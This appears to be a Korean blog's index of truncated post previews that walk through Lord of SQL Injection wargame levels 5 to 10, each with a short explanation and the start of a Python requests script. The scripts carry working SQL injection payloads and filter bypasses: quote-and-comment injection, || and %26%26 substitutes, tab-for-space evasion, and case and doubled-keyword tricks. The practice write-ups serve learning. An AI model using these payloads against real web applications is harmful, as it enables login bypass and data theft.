WarGame/LOS(22)
-
10. LOS - skeleton
LOS 10번째 문제 skeleton입니다! 먼저 코드를 보면 pw뒤에 and 1 = 0으로 만들어줘서 고의적으로 거짓으로 만들어 줬습니다.그럼 저 부분을 참으로 만들어줘야하는데저는 id에 'admin'을 넣고 뒷부분을 모두 주석으로 처리해주어서 풀었습니다 :)페이로드는 다음과 같습니다. 1234567891011import requestsimport string URL = "http://los.eagle-jump.org/skeleton_8d9cbfe1efbd44cfbbdc63fa605e5f1b.php"payload = "?pw=admin' or id='admin'%23"URL += payload cookies = dict(PHPSESSID = "dvs710ccqajrn9434hc3a00r11")respo..
2018.08.07 -
9. LOS - vampire
vampire문제입니다. str_replace명령어가 admin을 공백으로 변환하는 함수이니두가지 방법으로 풀 수 있습니다1. admin을 2번넣어주어서 사이를 공백으로 비워서 adadminmin->ad+""+min이 되게끔하기 2. ADMIN을 대문자로 넣어주셔서 그냥 프리패스하기! 페이로드입니다. 12345678910111213141516171819202122232425import requestsimport string URL = "http://los.eagle-jump.org/vampire_0538b0259b6680c1ca4631a388177ed4.php"payload = "?id=adadminmin"URL += payload cookies = dict(PHPSESSID = "dvs710ccqajr..
2018.08.06 -
8. LOS - troll
8번째 문제 troll입니다. 간단하게 풀었습니다. id에 admin을 넣어주면되는데 ereg함수는 대소문자를 구별해서 맨앞글자만 대문자로 해서 넣어주면 풀립니다 :) 페이로드입니다. 1234567891011import requestsimport string URL = "http://los.eagle-jump.org/troll_6d1f080fa30a07dbaf7342285ba0e158.php"payload = "?id=Admin"URL += payload cookies = dict(PHPSESSID="dvs710ccqajrn9434hc3a00r11")response = requests.get(URL, cookies = cookies)print(response.text) Colored by Color Sc..
2018.08.05 -
7. LOS - orge
LOS orge입니다 여기서 조금 많이 걸렸습니다. 소스코드를보면 4번 문제와 아주 유사한다 or하고 and 가 ban먹었습니다. 그래서 이거우회하느라 시간이 많이걸렸고 알수없는 문법오류떄문에 삽질했습니다..ㅎ tip!! {or -> ||and -> %26%26 } 아래는 페이로드입니다. 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849import requestsimport string num_alpha = string.digits + string.ascii_letterspassword = "" #find length passwdresetURL = "http://los.eagle-jump.org..
2018.08.05 -
6. LOS - darkelf
LOS 6번 darkelf입니다.소스코드를 확인하면 다음과 같습니다. 이전거와 달라진점을 찾는다면 or이 ban먹었습니다.전에 알려준 두번째 방법처럼 or -> ||으로 바꾸면 필터링을 넘어가게 됩니다! 페이로드입니다 :) 1234567891011121314import requestsimport string URL = "http://los.eagle-jump.org/darkelf_6e50323a0bfccc2f3daf4df731651f75.php"payload = "?pw=1'||id='admin'%23"URL += payload cookies = dict(PHPSESSID="dvs710ccqajrn9434hc3a00r11")response = requests.get(URL, cookies = cookie..
2018.08.05 -
5. LOS - wolfman
이번은 LOS 5번 wolfman입니다. 소스코드를 확인하면 id를 admin으로 만들어주면 풀 수 있게 됩니다. 페이로드는 다음과 같습니다. 12345678910111213import requestsimport string URL = "http://los.eagle-jump.org/wolfman_f14e72f8d97e3cb7b8fe02bef1590757.php"payload = "?pw=1'or%09id='admin'%23" # "?pw=1'||id='admin'%23" 0: for i in range(1, 10) : print("WOOOOOOOOOOOOOOOOOOOOOOWsolveIT!!")cs
2018.08.05